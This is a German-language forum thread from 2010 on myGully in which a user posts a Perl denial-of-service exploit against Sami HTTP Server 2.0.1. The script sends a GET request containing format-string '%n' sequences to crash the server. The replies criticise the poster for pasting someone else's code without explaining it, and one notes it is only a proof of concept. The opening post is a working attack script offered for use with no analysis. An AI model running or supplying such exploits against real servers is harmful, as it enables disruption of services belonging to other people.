myGully.com Boerse.SH - BOERSE.AM - BOERSE.IO - BOERSE.IM Boerse.BZ .TO Nachfolger
Zurück   myGully.com > Computer & Technik > Sicherheit & Anonymität
Seite neu laden

Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit

Willkommen

myGully

Links

Forum

 
Thema geschlossen
Themen-Optionen Ansicht
Ungelesen 10.11.10, 23:33   #1
GoodDay
Banned
 
Registriert seit: Apr 2009
Ort: Reversing Center
Beiträge: 49
Bedankt: 436
GoodDay ist noch neu hier! | 0 Respekt Punkte
Standard Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit

Code:
#!/usr/bin/perl
# Exploit Titel: Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit
# Date: 25.10.10
# Tool: Sami HTTP Server -- Version: 2.0.1
# Vendor-Website: http://www.karjasoft.com/old.php
# Download Link: http://www.karjasoft.com/files/samihttp/samihttpd_install.exe
# Author: wingthor
# Author-Website (German): http://www.wingthor.de
# Author-Email: [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
# Tested on: Windows XP SP3
# Type: DOS/POC
 
 
use IO::Socket;
 
$target = "127.0.0.1";
$port   = 80;
 
$payload = "GET /%n%n%n%n%n HTTP/1.1\r\n\r\n";
 
$sock = IO::Socket::INET->new(Proto=>'tcp', PeerHost=>$target, PeerPort=>$port) or die "Error: $target:$port\n";
 
$sock->send($payload);
 
close($sock);
GoodDay ist offline  
Ungelesen 11.11.10, 13:52   #2
gosha16
Banned
 
Registriert seit: Sep 2009
Ort: /root/
Beiträge: 815
Bedankt: 640
gosha16 ist noch neu hier! | 0 Respekt Punkte
Standard

Und hast du jetz irgend eine Frage dazu? Oder wolltest du einfach bloß IRGENDWAS posten?
gosha16 ist offline  
Ungelesen 11.11.10, 19:22   #3
GoodDay
Banned
 
Registriert seit: Apr 2009
Ort: Reversing Center
Beiträge: 49
Bedankt: 436
GoodDay ist noch neu hier! | 0 Respekt Punkte
Standard

Irgendwas? Naja, eher ein Exploit.
Dieser Thread wurde [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] verlinkt, solltest du dir vielleicht mal durchlesen.
GoodDay ist offline  
Ungelesen 11.11.10, 21:36   #4
spartan-b292
Echter Freak
 
Benutzerbild von spartan-b292
 
Registriert seit: Mar 2010
Ort: /home/spartan-b292
Beiträge: 2.856
Bedankt: 1.701
spartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punktespartan-b292 leckt gerne myGully Deckel in der Kanalisation! | 230828 Respekt Punkte
Standard

Einen Codeschnipsel, der noch dazu von jemand anderem ist, posten kann jeder, beschreiben wie er funktioniert und was er macht, da gehört schon ein bischen mehr dazu. Außerdem handelt es sich dabei laut der Website des Autors nur um ein Proof of Concept.
__________________
"They who can give up essential liberty to obtain a little temporary safety, deserve neither liberty nor safety"
spartan-b292 ist offline  
Ungelesen 11.11.10, 21:59   #5
GoodDay
Banned
 
Registriert seit: Apr 2009
Ort: Reversing Center
Beiträge: 49
Bedankt: 436
GoodDay ist noch neu hier! | 0 Respekt Punkte
Standard

LESEN:
Zitat:
GET Request Denial of Service Exploit
Es ist ein HTTP DoS Exploit, simpler gehts kaum.
GoodDay ist offline  
Thema geschlossen


Forumregeln
Du kannst keine neue Themen eröffnen
Du kannst keine Antworten verfassen
Du kannst keine Anhänge posten
Du kannst nicht deine Beiträge editieren

BB code is An
Smileys sind An.
[IMG] Code ist An.
HTML-Code ist Aus.

Gehe zu


Alle Zeitangaben in WEZ +1. Es ist jetzt 16:37 Uhr.


Sitemap

().